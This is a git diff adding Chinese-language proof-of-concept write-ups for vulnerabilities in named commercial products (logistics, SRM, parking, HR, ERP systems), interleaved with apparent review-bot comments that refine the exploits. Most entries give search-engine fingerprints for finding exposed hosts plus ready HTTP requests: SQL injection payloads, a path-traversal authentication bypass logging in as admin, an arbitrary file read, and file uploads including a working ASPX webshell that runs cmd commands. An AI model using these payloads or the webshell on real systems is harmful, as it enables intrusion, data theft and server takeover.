@@ -0,0 +1,37 @@ +## 易思智能物流无人值守系统login存在SQL注入漏洞 + +易思智能物流无人值守系统login存在SQL注入漏洞.md + +## fofa + +```javascript +body="/api/SingleLogin" +``` + +## poc + +```javascript +POST /api/PhoneLogin/login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip + +Account=1'%20and%20sys.fn_sqlvarbasetostr(HashBytes('MD5','123'))=1--&Espassword=g5edid4OCFI32C5NPEZeXg%3D%3D +``` + +```javascript +OST /api/SingleLogin/login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded; charset=utf-8 +Priority: u=0 +X-Requested-With: XMLHttpRequest +Accept-Encoding: gzip, deflate + +LoginUserType=0&DeviceType=2&Account=1'%20and%20sys.fn_sqlvarbasetostr(HashBytes('MD5','123'))=1--&BrowserType=Firefox&Verifycode=&IMEI=&isverify=false&SetOfBooks=Default&Espassword=1wD%2Bj6eIbahZGOatg1Spiw%3D%3D +``` + +![image-20241106172316570](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061723637.png) diff --git a/星网锐捷DMB-BSLED屏信息发布系统taskexport接口处存在敏感信息泄露.md b/星网锐捷DMB-BSLED屏信息发布系统taskexport接口处存在敏感信息泄露.md new file mode 100644 index 0000000..24d1360 --- /dev/null +++ b/星网锐捷DMB-BSLED屏信息发布系统taskexport接口处存在敏感信息泄露.md 
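Review bot: the second request in 易思智能物流无人值守系统login存在SQL注入漏洞.md starts with `OST /api/SingleLogin/login HTTP/1.1`; the method is missing its first letter and the request will not parse. Both requests use `Account=1' and sys.fn_sqlvarbasetostr(HashBytes('MD5','123'))=1--`, an error-based check where the conversion failure echoes the hash of `123` in the error text, but the expected marker is never written down, and the description line is the file name pasted in (`易思智能物流无人值守系统login存在SQL注入漏洞.md`). State the marker and replace the description with a sentence about the endpoint.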
@@ -0,0 +1,32 @@ +# 星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露 + +**一、漏洞简介** +星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露,攻击者可以可以通过此漏洞读取 FTP 服务器地址、端口及账号密码,通过 FTP 可篡改 LED 发布信息 +**二、影响版本** + +星网锐捷信息发布系统 + +**三、资产测绘** + +```plain +app="STAR_NET-数字标牌系统" +``` + +![1714230441699-d5a76730-3ee2-45ac-ac2c-f0fc80a888f2.png](./img/L5KeVGbPn4qhJj98/1714230441699-d5a76730-3ee2-45ac-ac2c-f0fc80a888f2-017172.png) + +●登录![1713938803895-b19dd8b0-de6f-4aa9-9c79-2871255ec1ee.png](./img/L5KeVGbPn4qhJj98/1713938803895-b19dd8b0-de6f-4aa9-9c79-2871255ec1ee-123299.png) + +**四、漏洞复现** + +```plain +/dmb/out/taskexport.jsp?taskcode +``` + +![1713938753911-0910a298-b3a4-49a1-842c-5baf166b0abd.png](./img/L5KeVGbPn4qhJj98/1713938753911-0910a298-b3a4-49a1-842c-5baf166b0abd-242564.png) + +[XWRJ-DMB-BS-InformationLeakage.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1719200545313-daca3f8d-524a-48d9-83ba-d930e0d9385b.yaml) + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/星网锐捷视频话机设备pwdsetting管理密码泄漏.md b/星网锐捷视频话机设备pwdsetting管理密码泄漏.md new file mode 100644 index 0000000..71d2aef --- /dev/null +++ b/星网锐捷视频话机设备pwdsetting管理密码泄漏.md @@ -0,0 +1,28 @@ +# 星网锐捷视频话机设备pwdsetting管理密码泄漏 + +**一、漏洞简介** +星网锐捷视频话机设备 泄露管理员密码,攻击者可利用密码直接进入后台配置页面,执行恶意操作,为进一步攻击提供帮助。 +**二、影响版本** + +星网锐捷视频话机设备 + +**三、资产测绘** + +```plain +body="tmid_top_label" +``` + +●登录页![1711938753201-a499e700-224a-4dd8-bf3b-ea7d54ed1574.png](./img/DzvaFQV7DsT5tO_q/1711938753201-a499e700-224a-4dd8-bf3b-ea7d54ed1574-768831.png) + +**四、漏洞复现** + +```plain +/console/secure/pwdsetting +``` + +![1711938770662-d997d58a-e99d-4997-8e3a-2ff9d2977ab8.png](./img/DzvaFQV7DsT5tO_q/1711938770662-d997d58a-e99d-4997-8e3a-2ff9d2977ab8-412419.png) + + + +> 更新: 2024-06-24 11:42:25 +> 原文: \ No newline at end of file diff --git a/智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞.md b/智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞.md new file mode 100644 index 0000000..62ec54a --- /dev/null +++ b/智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞.md 
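Review bot: in 智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞.md the path `/adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=c:\\windows\win.ini` has two parts doing different jobs: the `%2e%2e;` segment is the same `/adpweb/static/..;/` prefix the autologin entry later in this commit relies on to reach an endpoint without authenticating, and `path=` is the file read. Say so, and state whether `download` is reachable without the prefix; otherwise readers will assume the traversal alone is the finding. In 星网锐捷DMB-BSLED屏信息发布系统taskexport接口处存在敏感信息泄露.md the PoC is `/dmb/out/taskexport.jsp?taskcode` with no value; say whether the parameter may be empty or needs a valid task code, and that the FTP host, port and credentials appear in the returned export, since that is what 漏洞简介 claims. The 视频话机 pwdsetting entry is fine as a path, but it should also name what the response contains.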
@@ -0,0 +1,19 @@ +# 智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞 + +智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞 + +## fofa + +```yaml +title=="SRM 2.0" +``` + +## poc + +```java +GET /adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=c:\\windows\win.ini HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408162052746.png) diff --git a/智慧平台SExcelExpErr.ashx存在SQL注入漏洞.md b/智慧平台SExcelExpErr.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..b3f8c0b --- /dev/null +++ b/智慧平台SExcelExpErr.ashx存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +### 智慧平台SExcelExpErr.ashx存在SQL注入漏洞 +智慧平台SExcelExpErr存在SQL注入漏洞,攻击者可通过该漏洞获取数据敏感信息。 + +## fofa +```javascript +body="custom/blue/uimaker/easyui.css" +``` + +## poc + +```plain +GET /ashx/KQ/SExcelExpErr.ashx?action=list&importtype=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1728547381034-1a95c6c4-532a-43f3-b852-1c52b5cb8fc5.png) + diff --git a/智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞.md b/智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞.md new file mode 100644 index 0000000..9097e70 --- /dev/null +++ b/智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞.md 
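Review bot: 智慧平台SExcelExpErr.ashx存在SQL注入漏洞.md names no vendor or product beyond "智慧平台" and fingerprints the target only by `body="custom/blue/uimaker/easyui.css"`, a UI theme path that many unrelated ASP.NET sites ship; add a product name or a second fingerprint so the fofa hit list is not mostly false positives. The injection `importtype=1';WAITFOR DELAY '0:0:5'--` is time-based; write the expected delay into the text rather than relying on the screenshot.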
@@ -0,0 +1,31 @@ +## 智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞 + +智慧校园(安校易)管理系统 FileUpAd.aspx 接口处存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。 + +## fofa + +```yaml +title="智慧综合管理平台登入" +``` + +## poc + +```java +POST /Module/FileUpPage/FileUpAd.aspx?file_tmid=upload HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=----21909179191068471382830692394 +Connection: close + +------21909179191068471382830692394 +Content-Disposition: form-data; name="File"; filename="asd.aspx" +Content-Type: image/jpeg + +<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%> +------21909179191068471382830692394-- +``` + +文件路径`http://ip/imgnews/imgad/000000/upload.aspx?cmd=whoami` \ No newline at end of file diff --git a/智联云采SRM2.0系统接口autologin身份认证绕过漏洞.md b/智联云采SRM2.0系统接口autologin身份认证绕过漏洞.md new file mode 100644 index 0000000..7ae3f10 --- /dev/null +++ b/智联云采SRM2.0系统接口autologin身份认证绕过漏洞.md 
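Review bot: the shell uploaded in 智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞.md ends with `System.IO.File.Delete(Request.PhysicalPath);`, so `http://ip/imgnews/imgad/000000/upload.aspx?cmd=whoami` works exactly once and then returns 404; the write-up should say this, or readers will report a failed reproduction after the first hit. It also does not explain that the stored name `upload.aspx` comes from `?file_tmid=upload` in the request URL while `filename="asd.aspx"` is discarded; that mapping is the key fact of the finding. Minor: `Accept-Language: ...,en;q=0.2,` has a trailing comma.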
@@ -0,0 +1,20 @@ +# 智联云采SRM2.0系统接口autologin身份认证绕过漏洞 + +由于智联云采 SRM2.0 autologin 接口代码逻辑存在缺陷,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台,造成信息泄露,使系统处于极不安全的状态。 + +## fofa + +```yaml +title=="SRM 2.0" +``` + +## poc + +```java +GET /adpweb/static/..;/api/sys/app/autologin?loginName=admin HTTP/1.1 +Host: +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409031840266.png) + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409031840544.png) \ No newline at end of file diff --git a/智联云采testService存在SQL注入漏洞.md b/智联云采testService存在SQL注入漏洞.md new file mode 100644 index 0000000..07fcf6d --- /dev/null +++ b/智联云采testService存在SQL注入漏洞.md @@ -0,0 +1,32 @@ +# 智联云采testService存在SQL注入漏洞 + +智联云采testService存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息。 + +## fofa + +```yaml +title=="SRM 2.0" +``` + +## poc + +```java +POST /adpweb/a/ica/api/testService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +X-Requested-With: XMLHttpRequest +Content-Type: application/json + +{ + "dbId": "1001", + "dbSql": "#set ($lang = $lang) SELECT * FROM v$version", + "responeTemplate": "{\"std_data\": {\"execution\": {\"sqlcode\": \"$execution.sqlcode\", \"description\": \"$execution.description\"}}}", + "serviceCode": "q", + "serviceName": "q", + "serviceParams": "{\"lang\":\"zh_CN\"}" +} +``` + +![image-20241018154644283](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181546560.png) + +![image-20241018154704052](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181547135.png) \ No newline at end of file diff --git a/智能停车管理系统GetPasswayData存在SQL注入漏洞.md b/智能停车管理系统GetPasswayData存在SQL注入漏洞.md new file mode 100644 index 0000000..5b7c53c --- /dev/null +++ b/智能停车管理系统GetPasswayData存在SQL注入漏洞.md 
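Review bot: 智联云采SRM2.0系统接口autologin身份认证绕过漏洞.md should name the two pieces of `GET /adpweb/static/..;/api/sys/app/autologin?loginName=admin`: the `/static/..;/` prefix that gets the request past the authentication filter (also used by the download entry) and the `autologin` handler that issues a session for any `loginName` with no credential; "构造特殊绕过身份认证" says neither. In 智联云采testService存在SQL注入漏洞.md the sentence `未经身份验证的远程攻击者除了可以利用 此漏洞获取数据库中的信息。` is cut off (除了…之外 never closes), and the JSON field `"dbSql": "#set ($lang = $lang) SELECT * FROM v$version"` is executed as given, i.e. direct SQL execution rather than injection; `#set` is a Velocity directive and the text should explain why that prefix is required, and `v$version` is Oracle syntax, so say the backend is Oracle or give a portable probe.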
@@ -0,0 +1,24 @@ +# 智能停车管理系统GetPasswayData存在SQL注入漏洞 + +停车场后台管理系统 GetPasswayData 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa + +```yaml +icon_hash="938984120" +``` + +## poc + +```java +POST /LaneMonitor/GetPasswayData HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +SentryHost_No=1';SELECT+SLEEP(5)# +``` + diff --git a/智能停车管理系统ToLogin存在SQL注入漏洞.md b/智能停车管理系统ToLogin存在SQL注入漏洞.md new file mode 100644 index 0000000..6dca068 --- /dev/null +++ b/智能停车管理系统ToLogin存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +# 智能停车管理系统ToLogin存在SQL注入漏洞 + +停车场后台管理系统 ToLogin 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml +icon_hash="938984120" +``` + +## poc + +```java +POST /Login/ToLogin HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +Admins_Account=1' AND (SELECT 8104 FROM (SELECT(SLEEP(5)))dEPM) AND 'JYpL'='JYpL&Admins_Pwd= +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408162052998.png) diff --git a/智跃人力资源管理系统GenerateEntityFromTable.aspx-SQL漏洞.md b/智跃人力资源管理系统GenerateEntityFromTable.aspx-SQL漏洞.md new file mode 100644 index 0000000..6fcaccc --- /dev/null +++ b/智跃人力资源管理系统GenerateEntityFromTable.aspx-SQL漏洞.md 
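Review bot: the two 智能停车管理系统 entries probe the same backend in different ways. GetPasswayData uses a stacked query, `SentryHost_No=1';SELECT+SLEEP(5)#`, which only fires if the driver allows multi-statements, while ToLogin uses an inline subquery, `Admins_Account=1' AND (SELECT 8104 FROM (SELECT(SLEEP(5)))dEPM) AND 'JYpL'='JYpL`, which does not depend on that. Use the subquery form in both, or note that stacking was confirmed against the product. The GetPasswayData summary has the same truncated sentence as testService (`...除了可以利用 SQL 注入漏洞获取数据库中的信息。`), and `icon_hash="938984120"` is given in both files without saying which vendor or product the favicon belongs to.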
@@ -0,0 +1,12 @@ +## 智跃人力资源管理系统GenerateEntityFromTable.aspx SQL漏洞 + +## fofa +``` +app="ZY-人力资源管理系统" +``` + +## poc +``` +http://127.0.0.1:8085/resource/utils/GenerateEntityFromTable.aspx?t=1%27%2B(SELECT%20CHAR(103)%2BCHAR(87)%2BCHAR(114)%2BCHAR(112)%20WHERE%201669%3D1669%20AND%206492%20IN%20(select+@@version))%2B%27 +``` + diff --git a/智跃人力资源管理系统GenerateEntityFromTable.aspxSQL注入漏洞.md b/智跃人力资源管理系统GenerateEntityFromTable.aspxSQL注入漏洞.md new file mode 100644 index 0000000..a3e8cb6 --- /dev/null +++ b/智跃人力资源管理系统GenerateEntityFromTable.aspxSQL注入漏洞.md @@ -0,0 +1,33 @@ +# 智跃人力资源管理系统 GenerateEntityFromTable.aspx SQL注入漏洞 + +# 一、漏洞简介 +智跃人力资源管理系统是基于B/S网页端广域网平台,一套考勤系统即可对全国各地多个分公司进行统一管控,成本更低。信息共享更快。跨平台,跨电子设备。智跃人力资源管理系统 GenerateEntityFromTable.aspx SQL注入漏洞,攻击者可通过该漏洞获取数据库权限。 + +# 二、影响版本 ++ 智跃人力资源管理系统 + +# 三、资产测绘 ++ hunter`web.body="ZY.LOGO.64.png"` ++ 特征 + +![1700999921759-eb1f0195-0120-4c54-8bc9-5818fb075b7e.png](./img/94IJ8Ml0P1Ag0IDx/1700999921759-eb1f0195-0120-4c54-8bc9-5818fb075b7e-497556.png) + +# 四、漏洞复现 +```plain +/resource/utils/GenerateEntityFromTable.aspx?t=1%27%2B(SELECT%20CHAR(103)%2BCHAR(87)%2BCHAR(114)%2BCHAR(112)%20WHERE%201669%3D1669%20AND%206492%20IN%20(select%20SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%271230%27)),3,32)))%2B%27 +``` + +![1700999949055-76cc2f2c-0826-473c-943e-676e36dc5e33.png](./img/94IJ8Ml0P1Ag0IDx/1700999949055-76cc2f2c-0826-473c-943e-676e36dc5e33-974501.png) + +sqlmap + +```plain +/resource/utils/GenerateEntityFromTable.aspx?t=1 +``` + +![1701000199428-d43731eb-8092-4b6d-9abc-9a57e4a8f9ae.png](./img/94IJ8Ml0P1Ag0IDx/1701000199428-d43731eb-8092-4b6d-9abc-9a57e4a8f9ae-184237.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: \ No newline at end of file diff --git a/智邦国际ERPGetPersonalSealData.ashx接口SQL注入漏洞.md b/智邦国际ERPGetPersonalSealData.ashx接口SQL注入漏洞.md new file mode 100644 index 0000000..4a5401f --- /dev/null +++ b/智邦国际ERPGetPersonalSealData.ashx接口SQL注入漏洞.md 
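Review bot: 智跃人力资源管理系统GenerateEntityFromTable.aspx-SQL漏洞.md and 智跃人力资源管理系统GenerateEntityFromTable.aspxSQL注入漏洞.md cover the same parameter `t` of `/resource/utils/GenerateEntityFromTable.aspx`; the short one adds nothing except a `http://127.0.0.1:8085/` URL and a `select @@version` variant of the same error-based payload. Drop it and fold the `@@version` probe into the longer file. In the longer file the payload uses `HASHBYTES('MD5','1230')` but never writes down the 32-character hex the response should contain; add it so the reader is not checking against a screenshot.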
@@ -0,0 +1,45 @@ +# 智邦国际ERP GetPersonalSealData.ashx接口SQL注入漏洞 + +# 一、漏洞复现 +智邦国际ERP系统 GetPersonalSealData.ashx接口处存在SQL注入漏洞,未经身份认证的攻击者可利用此漏洞获取数据库敏感信息,深入利用可获取服务器权限。 + +# 二、影响版本 ++ 智邦国际ERP + +# 三、资产测绘 ++ web.icon=="0ab4ed9764a33fd85da03b00f44393e1" ++ 特征 + +![1704883537136-4947553c-c91b-4350-a9c8-1df6e73b1ec8.png](./img/OhYF0vdN8XPJVPA_/1704883537136-4947553c-c91b-4350-a9c8-1df6e73b1ec8-639576.png) + +# 四、漏洞复现 +```java +GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=%31%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%32%32%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%36%38%29%2b%43%48%41%52%28%31%31%30%29%2b%43%48%41%52%28%31%31%37%29%2b%43%48%41%52%28%31%31%31%29%2b%43%48%41%52%28%37%33%29%2b%43%48%41%52%28%38%36%29%2b%43%48%41%52%28%31%30%35%29%2b%43%48%41%52%28%37%30%29%2b%43%48%41%52%28%38%37%29%2b%43%48%41%52%28%31%31%37%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%37%36%29%2b%43%48%41%52%28%31%30%34%29%2b%43%48%41%52%28%38%32%29%2b%43%48%41%52%28%31%31%31%29%2b%43%48%41%52%28%31%30%35%29%2b%43%48%41%52%28%38%38%29%2b%43%48%41%52%28%31%31%38%29%2b%43%48%41%52%28%37%35%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%37%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%39%29%2b%43%48%41%52%28%38%39%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%36%36%29%2b%43%48%41%52%28%37%31%29%2b%43%48%41%52%28%31%30%38%29%2b%43%48%41%52%28%36%36%29%2b%43%48%41%52%28%37%33%29%2b%43%48%41%52%28%31%30%39%29%2b%43%48%41%52%28%31%30%31%29%2b%43%48%41%52%28%38%34%29%2b%43%48%41%52%28%38%35%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%31%31%30%29%2b%43%48%41%52%28%36%35%29%2b%43%48%41%52%28%39%38%29%2b%43%48%41%52%28%31%30%30%29%2b%43%48%41%52%28%38%37%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2b%43%48%41%52%28%31%31%33%29%2d%2d%20%79%68%6c%73 HTTP/1.1 
+Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ASP.NET_SessionId=o0oxkf2lkudmy5ueprfeapbl +Upgrade-Insecure-Requests: 1 +``` + +![1704886581249-064da2e0-8416-4202-a9ed-ad5d16488790.png](./img/OhYF0vdN8XPJVPA_/1704886581249-064da2e0-8416-4202-a9ed-ad5d16488790-137621.png) + +```java +qzbbqDnuoIViFWuALhRoiXvKeCeEYeBGlBImeTUAnAbdWqqqqq +``` + +sqlmap + +```java +/SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=1 +``` + +![1704886636864-d82ac9ca-3276-4b0a-aaa3-5ac1af53547c.png](./img/OhYF0vdN8XPJVPA_/1704886636864-d82ac9ca-3276-4b0a-aaa3-5ac1af53547c-432838.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: \ No newline at end of file diff --git a/月子会所ERP管理云平台AttachedHandler任意文件上传漏洞.md b/月子会所ERP管理云平台AttachedHandler任意文件上传漏洞.md new file mode 100644 index 0000000..28d4b1b Binary files /dev/null and b/月子会所ERP管理云平台AttachedHandler任意文件上传漏洞.md differ diff --git a/月子会所ERP管理云平台BasicInfo任意文件上传漏洞.md b/月子会所ERP管理云平台BasicInfo任意文件上传漏洞.md new file mode 100644 index 0000000..bcee927 --- /dev/null +++ b/月子会所ERP管理云平台BasicInfo任意文件上传漏洞.md 
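Review bot: in 智邦国际ERPGetPersonalSealData.ashx接口SQL注入漏洞.md the first heading is `# 一、漏洞复现` where every sibling file uses `一、漏洞简介` for the summary and `四、漏洞复现` for the request; rename it. The `userId=` payload is entirely percent-encoded, which hides that it is `1 UNION ALL SELECT CHAR(113)+CHAR(122)+...` producing the marker `qzbbqDnuoIViFWuALhRoiXvKeCeEYeBGlBImeTUAnAbdWqqqqq` quoted below it; show the decoded form once. The request carries `Cookie: ASP.NET_SessionId=o0oxkf2lkudmy5ueprfeapbl`; if the injection is reachable without a session, as "未经身份认证" claims, remove the cookie. Finally, 月子会所ERP管理云平台AttachedHandler任意文件上传漏洞.md is recorded as `Binary files /dev/null and b/... differ`, so its content cannot be reviewed at all; re-add it as UTF-8 text.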
@@ -0,0 +1,62 @@ +# 月子会所ERP管理云平台BasicInfo任意文件上传漏洞 + +# 一、漏洞简介 +月子会ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件,管控月子中心经营过程中各个环节。由于未对上传文件进行任何过滤,BasicInfo接口可上传任意文件,攻击者可利用该漏洞获取服务器控制权。 + +# 二、影响版本 ++ 月子会所ERP管理云平台 + +# 三、资产测绘 ++ fofa`product="妈妈宝盒-ERP"` ++ 登录页面 + +![1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab.png](./img/tko20JbtQ88aBvJ4/1693185375907-6915a126-7596-4142-b75c-f6a9c41760ab-831920.png) + +# 四、漏洞复现 +```plain +POST /Page/BasicInfo/ashx/UpLoadHandler.ashx HTTP/1.1 +Content-Type: multipart/form-data; boundary=00content0boundary00 +User-Agent: Java/1.8.0_301 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 481 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="1.ashx" + +<% @ webhandler language="C#" class="AverageHandler" %> +using System; +using System.Web; + +public class AverageHandler : IHttpHandler +{ + public bool IsReusable + { + get { + return true; + } + } + public void ProcessRequest(HttpContext ctx) + { + ctx.Response.Write("hello"); + } + } +--00content0boundary00-- + +``` + +![1695621128660-95318319-a4b9-4b06-b2d6-84be4562b7a7.png](./img/tko20JbtQ88aBvJ4/1695621128660-95318319-a4b9-4b06-b2d6-84be4562b7a7-050105.png) + +根据响应拼接上传地址 + +```plain +/UploadBaseFolder/Contact/2309259440240.ashx +``` + +![1695621179771-1de55016-f429-4050-b796-b55a87d0f961.png](./img/tko20JbtQ88aBvJ4/1695621179771-1de55016-f429-4050-b796-b55a87d0f961-012351.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/月子会所ERP管理云平台ContractManager任意文件上传漏洞.md b/月子会所ERP管理云平台ContractManager任意文件上传漏洞.md new file mode 100644 index 0000000..a193306 Binary files /dev/null and b/月子会所ERP管理云平台ContractManager任意文件上传漏洞.md differ diff --git a/月子会所ERP管理云平台GetData.ashx存在SQL注入.md b/月子会所ERP管理云平台GetData.ashx存在SQL注入.md new file mode 100644 index 0000000..795f75d --- /dev/null +++ b/月子会所ERP管理云平台GetData.ashx存在SQL注入.md 
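Review bot: 月子会所ERP管理云平台BasicInfo任意文件上传漏洞.md titles the finding "BasicInfo" but the vulnerable handler is `/Page/BasicInfo/ashx/UpLoadHandler.ashx`; put the handler name in the title and summary, as the ICManager and UploadComponent entries do. The text says `根据响应拼接上传地址` and then gives `/UploadBaseFolder/Contact/2309259440240.ashx`, but the response field that carries that path exists only in the screenshot; quote it. 月子会所ERP管理云平台ContractManager任意文件上传漏洞.md at the end of this hunk is again committed as a binary blob and is unreviewable; re-add it as text.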
@@ -0,0 +1,21 @@ +# 月子会所ERP管理云平台GetData.ashx存在SQL注入 + +月子会所ERP管理云平台 GetData.ashx 接口处存在SQL注入漏洞未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa +```javascript +body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx" +``` + +## poc +```javascript +GET /Page/BasicInfo/ashx/GetData.ashx?ChannelId=&ClientName=1&FitemId=null&Phone=1{{urlescape(' AND 4798 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4798=4798) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113)))-- uTFu)}}&RequestMethod=ApplyActivity&SaleId= HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +``` + +![image-20241227222800031](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272228089.png) \ No newline at end of file diff --git a/月子会所ERP管理云平台ICManager任意文件上传漏洞.md b/月子会所ERP管理云平台ICManager任意文件上传漏洞.md new file mode 100644 index 0000000..03f8500 --- /dev/null +++ b/月子会所ERP管理云平台ICManager任意文件上传漏洞.md 
